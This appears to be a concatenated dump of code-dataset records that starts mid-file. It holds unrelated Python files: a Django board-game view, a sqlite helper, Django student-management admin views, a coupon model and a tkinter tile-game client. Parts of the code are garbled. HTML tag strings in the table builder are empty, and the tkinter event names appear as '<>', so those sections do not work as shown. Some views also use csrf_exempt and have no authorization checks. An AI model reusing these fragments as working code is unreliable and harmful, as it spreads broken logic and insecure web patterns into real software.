cards.replace(' ', '')\n cards = ' '.join(c.replace('\\u200b', '').replace('\\u200b', '') for c in cards.split(',')).split(' ')\n\n players = request.POST.get('players', '')\n end_game = len(board)\n\n d_players = {}\n for player in range(int(players)):\n d_players[int(player) + 1] = 0\n\n count = 0\n\n player = 1\n for card in cards:\n if player > int(players):\n player = 1\n count += 1\n try:\n player_position = d_players[player]\n\n if len(str(card)) == 2:\n index = board[player_position::].index(card[0]) + player_position\n index += board[index+1::].index(card[0]) + 1 + player_position\n else:\n index = board[player_position::].index(card) + 1 + player_position\n d_players[player] = index\n\n if d_players[player] >= end_game:\n 
self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), player, count)\n return render(request, self.template_name, {'message':\n f'Player {player} won after {count} cards'})\n player += 1\n except ValueError:\n self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), player, count)\n return render(request, self.template_name, {'message':\n f'Player {player} won after {count} cards WITH ERROR'})\n\n self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), 0, count)\n return render(request, self.template_name, {'message': f'No one won after {count} cards'})\n\n return render(request, self.template_name, {'message': 'Form is invalid!'})\n\n def add_to_db(self, board, cards, players, winner, count_cards_to_win):\n result = GameResult(board=board, cards=str(cards), players=int(players), winner=winner,\n count_cards_to_win=count_cards_to_win)\n result.save()\n","repo_name":"semmy07/test-game-django","sub_path":"game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12937995491","text":"import sqlite3\nfrom sqlite3 import Error\n\ndef init_conn(path):\n conn = None\n try:\n conn = sqlite3.connect(path)\n print (\"Connection established!\")\n except Error as e:\n print (e)\n print (\"Connection failed!\")\n return conn \n\ndef init_tables(connection):\n sql = \"CREATE TABLE IF NOT EXISTS hardware( id integer PRIMARY KEY, unit text NOT NULL, value text NOT NULL);\"\n connection.execute(sql)\n\ndef prepareDb(name):\n conn = init_conn(name)\n init_tables(conn)\n conn.close()\n\ndef getData(name):\n connection = init_conn(name)\n sql = \"SELECT * FROM hardware;\"\n cursor = connection.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n connection.close()\n\n return rows\n\ndef generateDataHTMLTable(rows):\n dataTable = \"\"\n for row in rows:\n dataTable += \"\"\n for cell in row:\n dataTable += \"\"\n dataTable += \"\"\n dataTable += \"
\" + str(cell) + \"
\"\n return dataTable\n\ndef sendData(db, unit, value):\n connection = init_conn(db)\n sql = \"INSERT INTO hardware(`unit`, `value`) VALUES(?, ?);\"\n args = (unit, value)\n cursor = connection.cursor()\n cursor.execute(sql, args)\n connection.commit()\n connection.close()\n","repo_name":"NG-2022-Stanislav-Mykhailenko/NG_2022_Stanislav_Mykhailenko","sub_path":"Lesson_6/Task 2/databaseWorker.py","file_name":"databaseWorker.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71949402162","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom student.models import *\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.core import serializers\nimport json\n\n# Create your views here.\n\ndef hod_home(request):\n student_count1=Students.objects.all().count()\n staff_count=Staffs.objects.all().count()\n subject_count=Subjects.objects.all().count()\n course_count=Courses.objects.all().count()\n\n course_all=Courses.objects.all()\n course_name_list=[]\n subject_count_list=[]\n student_count_list_in_course=[]\n for course in course_all:\n subjects=Subjects.objects.filter(course_id=course.id).count()\n students=Students.objects.filter(course_id=course.id).count()\n course_name_list.append(course.course_name)\n subject_count_list.append(subjects)\n student_count_list_in_course.append(students)\n\n subjects_all=Subjects.objects.all()\n subject_list=[]\n student_count_list_in_subject=[]\n for subject in subjects_all:\n course=Courses.objects.get(id=subject.course_id.id)\n student_count=Students.objects.filter(course_id=course.id).count()\n subject_list.append(subject.subject_name)\n student_count_list_in_subject.append(student_count)\n\n staffs=Staffs.objects.all()\n attendance_present_list_staff=[]\n attendance_absent_list_staff=[]\n staff_name_list=[]\n for staff in staffs:\n subject_ids=Subjects.objects.filter(staff_id=staff.admin.id)\n attendance=Attendance.objects.filter(subject_id__in=subject_ids).count()\n leaves=LeaveReportStaff.objects.filter(staff_id=staff.id,leave_status=1).count()\n attendance_present_list_staff.append(attendance)\n attendance_absent_list_staff.append(leaves)\n staff_name_list.append(staff.admin.username)\n\n students_all=Students.objects.all()\n attendance_present_list_student=[]\n attendance_absent_list_student=[]\n student_name_list=[]\n for student in students_all:\n attendance=AttendanceReport.objects.filter(student_id=student.id,status=True).count()\n absent=AttendanceReport.objects.filter(student_id=student.id,status=False).count()\n leaves=LeaveReportStudent.objects.filter(student_id=student.id,leave_status=1).count()\n attendance_present_list_student.append(attendance)\n attendance_absent_list_student.append(leaves+absent)\n student_name_list.append(student.admin.username)\n\n context = {\n \"student_count\":student_count1,\n \"staff_count\":staff_count,\n \"subject_count\":subject_count,\n \"course_count\":course_count,\n \"course_name_list\":course_name_list,\n \"subject_count_list\":subject_count_list,\n \"student_count_list_in_course\":student_count_list_in_course,\n \"student_count_list_in_subject\":student_count_list_in_subject,\n \"subject_list\":subject_list,\n \"staff_name_list\":staff_name_list,\n \"attendance_present_list_staff\":attendance_present_list_staff,\n 
\"attendance_absent_list_staff\":attendance_absent_list_staff,\n \"student_name_list\":student_name_list,\n \"attendance_present_list_student\":attendance_present_list_student,\n \"attendance_absent_list_student\":attendance_absent_list_student\n }\n return render(request,'hod/home.html',context)\n\ndef add_staff(request):\n if request.method ==\"POST\":\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n username=request.POST.get(\"username\")\n email=request.POST.get(\"email\")\n password=request.POST.get(\"password\")\n address=request.POST.get(\"address\")\n #CHECK IF USERNAME ALREADY EXIST\n if CustomUser.objects.filter(username=username):\n messages.error(request, \"Username Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n #CHECK IF EMAIL ALREADY EXIST\n if CustomUser.objects.filter(email=email):\n messages.error(request, \"Email Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n try:\n user=CustomUser.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=2)\n user.staffs.address=address\n user.save()\n messages.success(request,\"Successfully Added Staff\")\n return redirect(reverse('hod:add_staff'))\n except:\n messages.error(request,\"Failed to Add Staff\")\n return redirect(reverse('hod:add_staff'))\n\n return render(request,'hod/add_staff.html')\n\ndef add_course(request):\n if request.method ==\"POST\":\n get_course=request.POST.get(\"course\")\n try:\n course = Courses(course_name=get_course)\n course.save()\n messages.success(request,\"Course added\")\n return redirect(reverse('hod:add_course'))\n except:\n messages.error(request,\"Failed to Add course\")\n return redirect(reverse('hod:add_course'))\n\n \n return render(request, 'hod/add_course.html')\n\ndef add_student(request):\n courses = Courses.objects.all()\n session_years = SessionYear.objects.all()\n context = {\n 'courses': courses,\n 'session_years':session_years\n }\n if request.method == \"POST\":\n first_name=request.POST[\"first_name\"]\n last_name=request.POST[\"last_name\"]\n username=request.POST[\"username\"]\n email=request.POST[\"email\"]\n password=request.POST[\"password\"]\n address=request.POST[\"address\"]\n course_id=request.POST[\"course\"]\n sex=request.POST[\"sex\"]\n session_year = request.POST[\"session_year\"]\n profile_pic = request.FILES[\"profile\"]\n #CHECK IF USERNAME ALREADY EXIST\n if CustomUser.objects.filter(username=username):\n messages.error(request, \"Username Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n #CHECK IF EMAIL ALREADY EXIST\n if CustomUser.objects.filter(email=email):\n messages.error(request, \"Email Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n try:\n user=CustomUser.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=3)\n user.students.address=address\n course_obj=Courses.objects.get(id=course_id)\n user.students.course_id=course_obj\n session_obj = SessionYear.objects.get(id=session_year)\n user.students.session_year=session_obj\n user.students.gender=sex\n user.students.profile_pic=profile_pic\n user.save()\n messages.success(request,\"Successfully Added Student\")\n return redirect(reverse(\"hod:add_student\"))\n except:\n messages.error(request,\"Failed to Add Student\")\n return redirect(reverse(\"hod:add_student\"))\n return render(request, 'hod/add_student.html',context)\n\ndef 
add_subject(request):\n courses = Courses.objects.all()\n staffs = CustomUser.objects.filter(user_type=2)\n context = {\n 'courses': courses,\n 'staffs':staffs\n }\n if request.method == \"POST\":\n subject_name=request.POST.get(\"subject_name\")\n course_id=request.POST.get(\"course\")\n course=Courses.objects.get(id=course_id)\n staff_id=request.POST.get(\"staff\")\n staff=CustomUser.objects.get(id=staff_id)\n\n try:\n subject=Subjects(subject_name=subject_name,course_id=course,staff_id=staff)\n subject.save()\n messages.success(request,\"Successfully Added Subject\")\n return redirect(reverse(\"hod:add_subject\"))\n except:\n messages.error(request,\"Failed to Add Subject\")\n return redirect(reverse(\"hod:add_subject\"))\n\n return render(request, 'hod/add_subject.html',context)\n\ndef add_session(request):\n if request.method == \"POST\":\n session_start_year = request.POST[\"session_start_year\"]\n session_end_year = request.POST[\"session_end_year\"]\n try:\n session_year = SessionYear(session_start_year=session_start_year,session_end_year=session_end_year)\n session_year.save()\n messages.success(request,\"Successfully Added add_session\")\n return redirect(reverse(\"hod:add_session\"))\n except:\n messages.error(request,\"Failed to Add Session\")\n return redirect(reverse(\"hod:add_session\"))\n\n \n return render(request, 'hod/add_session.html')\n\ndef manage_staff(request):\n staffs=Staffs.objects.all()\n context = {\n 'staffs':staffs\n }\n\n return render(request, 'hod/manage_staff.html', context)\n\ndef manage_student(request):\n students = CustomUser.objects.filter(user_type=3)\n context = {\n 'students': students\n }\n return render(request, 'hod/manage_student.html',context)\n\ndef manage_subject(request):\n subjects = Subjects.objects.all()\n context = {\n 'subjects': subjects\n }\n return render(request, 'hod/manage_subject.html',context)\n\ndef manage_course(request):\n courses = Courses.objects.all()\n context = {\n 'courses': courses\n }\n return render(request, 'hod/manage_course.html', context)\n\ndef manage_session(request):\n session_years = SessionYear.objects.all()\n context = {\n 'session_years': session_years\n }\n return render(request, 'hod/manage_session.html', context)\n\ndef edit_staff(request, pk):\n staff=Staffs.objects.get(id=pk)\n context = {\n 'staff': staff\n }\n if request.method ==\"POST\":\n admin_id=request.POST.get(\"admin_id\")\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n email=request.POST.get(\"email\")\n username=request.POST.get(\"username\")\n address=request.POST.get(\"address\")\n try:\n user=CustomUser.objects.get(id=admin_id)\n user.first_name=first_name\n user.last_name=last_name\n user.email=email\n user.username=username\n user.save()\n\n staff_model=Staffs.objects.get(id=pk)\n staff_model.address=address\n staff_model.save()\n messages.success(request,\"Successfully Edited Staff\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Staff\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n return render(request, 'hod/edit_staff.html', context)\n\n\ndef edit_student(request,pk):\n student = Students.objects.get(id=pk)\n courses = Courses.objects.all()\n session_years = SessionYear.objects.all()\n context = {\n 'student': student,\n 'courses':courses,\n 'session_years':session_years\n }\n\n if request.method == \"POST\":\n first_name=request.POST[\"first_name\"]\n last_name=request.POST[\"last_name\"]\n 
username=request.POST[\"username\"]\n email=request.POST[\"email\"]\n address=request.POST[\"address\"]\n course_id=request.POST[\"course\"]\n sex=request.POST[\"sex\"]\n session_year = request.POST[\"session_year\"]\n admin_id = request.POST[\"admin_id\"]\n profile_pic = request.FILES[\"profile\"]\n try:\n user = CustomUser.objects.get(id=admin_id)\n user.first_name=first_name\n user.last_name=last_name\n user.email=email\n user.username=username\n user.save()\n\n session_obj = SessionYear.objects.get(id=session_year)\n student.session_year=session_obj\n student.address=address\n student.gender=sex\n course=Courses.objects.get(id=course_id)\n student.course_id=course\n student.profile_pic=profile_pic \n student.save()\n messages.success(request,\"Successfully Edited Student\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed Edited Student\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n \n return render(request, 'hod/edit_student.html', context)\n\n\ndef edit_course(request,pk):\n course = Courses.objects.get(id=pk)\n context = {\n 'course': course\n }\n if request.method == \"POST\":\n course_name = request.POST[\"course\"]\n try:\n course.course_name=course_name\n course.save()\n messages.success(request,\"Successfully Edited Course\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Course\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_course.html',context)\n\n\ndef edit_subject(request,pk):\n subject = Subjects.objects.get(id=pk)\n courses = Courses.objects.all()\n staffs = CustomUser.objects.filter(user_type=2)\n context = {\n 'subject': subject,\n 'courses' : courses,\n 'staffs': staffs\n }\n if request.method == \"POST\":\n subject_name = request.POST[\"subject_name\"]\n course_id = request.POST[\"course\"]\n staff_id = request.POST[\"staff\"]\n staff = CustomUser.objects.get(id=staff_id)\n course = Courses.objects.get(id=course_id)\n try:\n subject.subject_name = subject_name\n subject.staff_id=staff\n subject.course_id=course\n subject.save()\n messages.success(request,\"Successfully Edited Subject\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Subject\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_subject.html',context)\n\ndef edit_session(request,pk):\n session_year = SessionYear.objects.get(id=pk)\n context = {\n 'session_year':session_year\n }\n if request.method == \"POST\":\n session_start_year = request.POST[\"session_start_year\"]\n session_end_year = request.POST[\"session_end_year\"]\n try:\n session_year.session_start_year = session_start_year\n session_year.session_end_year = session_end_year\n session_year.save()\n messages.success(request,\"Successfully Edited SessionYear\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit SessionYear\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_session.html',context)\n\ndef student_feedback_message(request):\n feedbacks=FeedBackStudent.objects.all()\n context = {\n 'feedbacks':feedbacks\n }\n return render(request,'hod/student_feedback_message.html',context)\n\n@csrf_exempt\ndef student_feedback_message_replied(request):\n feedback_id=request.POST.get(\"id\")\n feedback_message=request.POST.get(\"message\")\n\n try:\n 
feedback=FeedBackStudent.objects.get(id=feedback_id)\n feedback.feedback_reply=feedback_message\n feedback.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"False\")\n\ndef staff_feedback_message(request):\n feedbacks=FeedBackStaffs.objects.all()\n context = {\n 'feedbacks':feedbacks\n }\n return render(request,'hod/staff_feedback_message.html',context)\n\n@csrf_exempt\ndef staff_feedback_message_replied(request):\n feedback_id=request.POST.get(\"id\")\n feedback_message=request.POST.get(\"message\")\n\n try:\n feedback=FeedBackStaffs.objects.get(id=feedback_id)\n feedback.feedback_reply=feedback_message\n feedback.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"False\")\n\ndef student_leave_view(request):\n leaves = LeaveReportStudent.objects.all()\n context = {\n 'leaves': leaves\n }\n return render(request,'hod/student_leave_view.html',context)\n\ndef student_approve_leave(request,pk):\n leave = LeaveReportStudent.objects.get(id=pk)\n leave.leave_status = 1\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef student_disapprove_leave(request,pk):\n leave = LeaveReportStudent.objects.get(id=pk)\n leave.leave_status = 2\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef staff_leave_view(request):\n leaves = LeaveReportStaff.objects.all()\n context = {\n 'leaves': leaves\n }\n return render(request,'hod/staff_leave_view.html',context)\n\ndef staff_approve_leave(request,pk):\n leave = LeaveReportStaff.objects.get(id=pk)\n leave.leave_status = 1\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef staff_disapprove_leave(request,pk):\n leave = LeaveReportStaff.objects.get(id=pk)\n leave.leave_status = 2\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef admin_view_attendance(request):\n subjects=Subjects.objects.all()\n session_year_id=SessionYear.objects.all()\n context = {\n 'subjects': subjects,\n 'session_year_id':session_year_id\n }\n return render(request,\"hod/admin_view_attendance.html\",context)\n\n@csrf_exempt\ndef admin_get_attendance_dates(request):\n subject=request.POST.get(\"subject\")\n session_year_id=request.POST.get(\"session_year_id\")\n subject_obj=Subjects.objects.get(id=subject)\n session_year_obj=SessionYear.objects.get(id=session_year_id)\n attendance=Attendance.objects.filter(subject_id=subject_obj,session_year=session_year_obj)\n attendance_obj=[]\n for attendance_single in attendance:\n data={\"id\":attendance_single.id,\"attendance_date\":str(attendance_single.attendance_date),\"session_year_id\":attendance_single.session_year.id}\n attendance_obj.append(data)\n\n return JsonResponse(json.dumps(attendance_obj),safe=False)\n\n\n@csrf_exempt\ndef admin_get_attendance_student(request):\n attendance_date=request.POST.get(\"attendance_date\")\n attendance=Attendance.objects.get(id=attendance_date)\n\n attendance_data=AttendanceReport.objects.filter(attendance_id=attendance)\n list_data=[]\n\n for student in attendance_data:\n data_small={\"id\":student.student_id.admin.id,\"name\":student.student_id.admin.first_name+\" \"+student.student_id.admin.last_name,\"status\":student.status}\n list_data.append(data_small)\n return JsonResponse(json.dumps(list_data),content_type=\"application/json\",safe=False)\n\ndef admin_profile(request):\n user=CustomUser.objects.get(id=request.user.id)\n context ={\n 'user': user\n }\n if request.method ==\"POST\":\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n 
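One detail worth flagging in the AJAX endpoints above: `JsonResponse(json.dumps(attendance_obj), safe=False)` serializes twice, since `json.dumps` already produces a string that `JsonResponse` then encodes again, so the client receives a JSON string literal rather than an array. A minimal sketch of the single-encoding form, assuming the same list-of-dicts payload:

```python
from django.http import JsonResponse

def attendance_dates_response(attendance_obj):
    # attendance_obj is already a list of plain dicts, so it can be handed
    # straight to JsonResponse; safe=False permits a non-dict top-level value.
    return JsonResponse(attendance_obj, safe=False)
```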
username=request.POST.get(\"username\")\n email=request.POST.get(\"email\")\n password=request.POST.get(\"password\")\n #try:\n user.first_name=first_name\n user.last_name=last_name\n user.username=username\n user.email=email\n # if password!=None and password!=\"\":\n # customuser.set_password(password)\n user.save()\n messages.success(request, \"Successfully Updated Profile\")\n return redirect(\"hod:admin_profile\")\n \n return render(request,\"hod/admin_profile.html\",context)\n\n","repo_name":"BINAH25/student-management-system","sub_path":"hod/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17581215097","text":"import logging\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _\n\nfrom coupons.managers import ValidManager\n\nlogger = logging.getLogger(__name__)\n\n\nclass Coupon(models.Model):\n \"\"\"One time use coupons to apply a discount to a cart\"\"\"\n\n code = models.CharField(\n verbose_name=_(\"code\"),\n max_length=50,\n unique=True,\n help_text=_(\"Please use capital letters without spaces. Ex: SUMMER10\"),\n validators=[\n RegexValidator(\n \"^[A-Z0-9]*$\",\n \"Please use only uppercase letters and numbers without spaces.\",\n )\n ],\n )\n valid_from = models.DateTimeField(_(\"valid from\"), default=timezone.now)\n valid_to = models.DateTimeField(_(\"valid to\"))\n discount = models.PositiveIntegerField(\n _(\"discount\"),\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n help_text=_(\"Percentage value (0 to 100%)\"),\n )\n active = models.BooleanField(_(\"active\"), default=True)\n\n class Meta:\n ordering = (\"valid_to\",)\n\n objects = models.Manager()\n valid = ValidManager()\n\n def clean(self):\n # Don't allow valid_from date to be in the past\n if self.valid_from.date() < timezone.now().date():\n raise ValidationError(\n {\"valid_from\": _(\"Valid from date cannot be in the past.\")},\n code=\"invalid\",\n )\n\n # Don't allow valid_to date to be less than valid_from date\n if self.valid_to and (self.valid_to < self.valid_from):\n raise ValidationError(\n {\"valid_to\": _(\"Valid to date cannot be less than Valid from date\")},\n code=\"invalid\",\n )\n\n def is_valid(self):\n \"\"\"\n Determine if the coupon itself is valid or not.\n The criteria is:\n - coupon should not already be redeemed (i.e. 
be active)\n - valid_from < now < valid_to\n \"\"\"\n\n now = timezone.now()\n return self.active and (self.valid_from < now < self.valid_to)\n\n def redeem(self):\n \"\"\"Used when a coupon is redeemed by a user so that it cannot be used again\"\"\"\n\n if not self.is_valid():\n raise ValidationError(\"coupon is already invalid 🤷‍♀️\")\n\n logger.info(\"deactivating coupon(💣):%s...\" % self)\n\n self.active = False\n self.save()\n\n def __str__(self):\n return f\"{self.code}\"\n","repo_name":"gurupratap-matharu/falcon","sub_path":"coupons/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29015248472","text":"from tkinter import StringVar, Canvas, Listbox\nfrom tkinter.ttk import Frame, Button\nimport threading\n\nimport protocol\nfrom tile import Point, ALL_TILES\nfrom board import Board, PLAYER_COLOURS\nfrom yamlLoader import YamlLoader\nfrom home import Home\n\nsettings = YamlLoader.load()\n\n\nclass Game(Frame):\n # Game settings\n TILE_PX = settings['pixel']['tile']\n BORDER_PX = settings['pixel']['border']\n HAND_SPACING_PX = settings['pixel']['hand_space']\n\n def __init__(self, parent, sock, home: Home, idnum):\n super().__init__(parent)\n self.parent = parent\n self.home = home\n self.pack()\n\n # Game menu settings\n self.board_width = home.border_width\n self.board_height = home.border_height\n self.hand_size = home.hand_size\n self.board_width_px = Game.TILE_PX * self.board_width\n self.board_height_px = Game.TILE_PX * self.board_height\n self.hand_width_px = Game.TILE_PX * self.hand_size + Game.HAND_SPACING_PX * (self.hand_size - 1)\n self.canvas_width_px = max(self.board_width_px, self.hand_width_px) + 2 * Game.BORDER_PX\n self.canvas_height_px = self.board_height_px + Game.TILE_PX + 3 * Game.BORDER_PX\n self.sock = sock\n\n self.infolock = threading.Lock()\n\n # player id\n self.idnum = idnum\n # player id -> name\n self.playernames = dict(home.player_names)\n\n # hand settings\n self.handlock = threading.Lock()\n self.hand_offset = Point(\n (self.canvas_width_px - self.hand_width_px) / 2,\n 2 * Game.BORDER_PX + self.board_height_px)\n self.hand = [None] * self.hand_size\n self.handrotations = [0] * self.hand_size\n\n # board settings\n self.boardlock = threading.Lock()\n self.board = Board(self.board_width, self.board_height)\n self.board.tile_size_px = Game.TILE_PX\n self.lasttilelocation = None\n self.location = None\n self.playernums = dict(home.player_nums) # idnum -> player number (turn order)\n self.playerlist = list(home.player_list)\n self.playerlistvar = StringVar(value=[self.playernames[i] for i in self.playerlist]) # // maybe need change\n self.eliminatedlist = []\n self.currentplayerid = None\n self.boardoffset = Point(Game.BORDER_PX, Game.BORDER_PX)\n\n self.selected_hand = 0\n self.handrects = [None] * self.hand_size\n\n self.bind('<>', lambda ev: self.clear_board())\n self.bind('<>', lambda ev: self.draw_board())\n self.bind('<>', lambda ev: self.draw_hand())\n self.bind('<>', lambda ev: self.draw_tokens())\n self.bind('<>', lambda ev: self.draw_turn())\n self.bind('<>', lambda ev: self.on_quit())\n\n self.create_widgets()\n self.game_runing = True\n\n def create_widgets(self):\n # create canvas and so on\n frame = Frame(self, width=self.canvas_width_px + 200, height=self.canvas_height_px)\n frame.grid(column=0, row=0)\n\n self.canvas = Canvas(frame, width=self.canvas_width_px,\n height=self.canvas_height_px, 
bg=\"white\")\n\n self.board.draw_squares(self.canvas, self.boardoffset, self.play_tile)\n\n message_x = self.canvas_width_px / 2\n message_y = Game.BORDER_PX / 2\n\n self.your_turn_text = self.canvas.create_text(message_x, message_y, anchor='center', text='Your turn!',\n fill='black', state='hidden')\n self.eliminated_text = self.canvas.create_text(message_x, message_y, anchor='center',\n text='You were eliminated!', fill='black', state='hidden')\n self.you_won_text = self.canvas.create_text(message_x, message_y, anchor='center', text='You won!',\n fill='black', state='hidden')\n\n hand_offset = self.hand_offset\n\n for i in range(len(self.hand)):\n cid = self.canvas.create_rectangle(hand_offset.x + (Game.TILE_PX + Game.HAND_SPACING_PX) * i,\n hand_offset.y,\n hand_offset.x + (\n Game.TILE_PX + Game.HAND_SPACING_PX) * i + Game.TILE_PX,\n hand_offset.y + Game.TILE_PX,\n fill='#bbb', outline='#000', width=2,\n tags=('hand_rect', 'hand_rect_{}'.format(i)))\n\n self.handrects[i] = cid\n\n self.canvas.tag_bind(cid, \"\", lambda ev, i=i: self.rotate_hand_tile(ev, i))\n\n self.set_selected_hand(0)\n\n self.board.draw_tiles(self.canvas, self.boardoffset)\n\n self.canvas.grid(column=0, row=0, columnspan=1, rowspan=2)\n\n self.quit = Button(frame, text=\"QUIT\", command=self.on_quit)\n self.quit.grid(column=1, row=0, sticky='n')\n\n self.playerlistbox = Listbox(frame, listvariable=self.playerlistvar)\n self.playerlistbox.grid(column=1, row=1, sticky='s')\n\n def set_selected_hand(self, index):\n self.canvas.itemconfigure('hand_rect', fill='#bbb', outline='#000', width=2)\n\n self.selected_hand = index\n self.canvas.itemconfigure('hand_rect_{}'.format(index), fill='#fff', outline='#bbb', width=4)\n\n def play_tile(self, x, y):\n if self.lasttilelocation != None and self.location == None:\n return\n if self.currentplayerid != self.idnum:\n return\n\n if self.sock:\n with self.infolock:\n idnum = self.idnum\n if idnum != None:\n with self.handlock:\n tileid = self.hand[self.selected_hand]\n rotation = self.handrotations[self.selected_hand]\n if tileid != None:\n self.sock.send(protocol.MessagePlaceTile(idnum, tileid, rotation, x, y).pack())\n\n def rotate_hand_tile(self, ev, hand_index):\n if hand_index == self.selected_hand:\n with self.handlock:\n self.handrotations[hand_index] = (self.handrotations[hand_index] + 1) % 4\n self.draw_hand()\n else:\n self.set_selected_hand(hand_index)\n\n def choose_starting_token(self, position):\n with self.boardlock:\n if self.lasttilelocation and not self.location and self.currentplayerid == self.idnum:\n x, y = self.lasttilelocation\n self.sock.send(protocol.MessageMoveToken(self.idnum, x, y, position).pack())\n\n def clear_board(self):\n self.canvas.configure(bg='white')\n self.canvas.itemconfigure('board_square', fill=\"#bbb\", activefill=\"#fff\")\n self.canvas.delete('board_tile')\n self.canvas.delete('selection_token')\n self.canvas.delete('token')\n\n def draw_board(self):\n self.board.draw_tiles(self.canvas, self.boardoffset)\n\n def draw_hand(self):\n hand_offset = self.hand_offset\n\n self.canvas.delete('handtile')\n\n with self.handlock:\n for i in range(len(self.hand)):\n if self.hand[i] != None:\n drawpoint = Point(hand_offset.x + (Game.TILE_PX + 10) * i, hand_offset.y)\n tile = ALL_TILES[self.hand[i]]\n tile.draw(self.canvas, Game.TILE_PX, drawpoint, self.handrotations[i], ('handtile'))\n\n def draw_tokens(self):\n with self.boardlock:\n if self.lasttilelocation and not self.location:\n x, y = self.lasttilelocation\n 
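The `Game` class funnels redraw requests through Tk virtual events; the event names between `<<` and `>>` have been lost from this copy of the file, which is why the `bind('<>')` and `event_generate` calls above look empty. A self-contained sketch of the underlying pattern, with `<<Redraw>>` as a placeholder name rather than one of the original identifiers:

```python
import threading
import tkinter as tk

root = tk.Tk()
label = tk.Label(root, text="waiting")
label.pack()

# The handler runs on the Tk main loop, so it may touch widgets safely.
root.bind("<<Redraw>>", lambda ev: label.config(text="updated"))

def worker():
    # Background threads should not call widget methods directly;
    # event_generate(when="tail") is the commonly used thread-safe entry
    # point, provided Tcl/Tk was built with thread support.
    root.event_generate("<<Redraw>>", when="tail")

threading.Timer(1.0, worker).start()
root.mainloop()
```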
self.board.draw_selection_tokens(self.canvas, self.boardoffset, self.playernums, x, y,\n self.choose_starting_token)\n else:\n self.canvas.delete('selection_token')\n\n self.board.draw_tokens(self.canvas, self.boardoffset, self.playernums, self.eliminatedlist)\n\n def draw_turn(self):\n self.canvas.itemconfigure(self.you_won_text, state='hidden')\n self.canvas.itemconfigure(self.eliminated_text, state='hidden')\n self.canvas.itemconfigure(self.your_turn_text, state='hidden')\n\n if self.idnum in self.playernums:\n if self.idnum in self.eliminatedlist:\n self.canvas.itemconfigure(self.eliminated_text, state='normal')\n elif self.eliminatedlist and len(self.playerlist) == 1:\n self.canvas.itemconfigure(self.you_won_text, state='normal')\n elif self.currentplayerid == self.idnum:\n self.canvas.itemconfigure(self.your_turn_text, state='normal')\n\n playernum = self.playernums[self.idnum]\n playercolour = PLAYER_COLOURS[playernum]\n self.canvas.configure(bg=playercolour)\n\n def reset_game_state(self):\n\n with self.handlock:\n for i in range(len(self.hand)):\n self.hand[i] = None\n self.handrotations[i] = 0\n\n self.event_generate(\"<>\")\n\n with self.boardlock:\n self.board.reset()\n self.lasttilelocation = None\n self.location = None\n self.playernums = {}\n self.playerlist.clear()\n self.eliminatedlist.clear()\n self.currentplayerid = None\n\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n\n def set_player_turn(self, idnum):\n with self.boardlock:\n if not idnum in self.playernums:\n playernum = len(self.playernums)\n self.playernums[idnum] = playernum\n\n with self.infolock:\n playername = self.playernames[idnum]\n self.playerlist.append(idnum)\n\n self.playerlistvar.set([self.playernames[i] for i in self.playerlist])\n\n self.currentplayerid = idnum\n\n self.event_generate(\"<>\")\n\n def tile_placed(self, msg):\n\n with self.boardlock:\n idx = self.board.tile_index(msg.x, msg.y)\n self.board.tileids[idx] = msg.tileid\n self.board.tilerotations[idx] = msg.rotation\n self.board.tileplaceids[idx] = msg.idnum\n\n self.event_generate(\"<>\")\n\n with self.infolock:\n if self.idnum == msg.idnum:\n with self.handlock:\n selected = 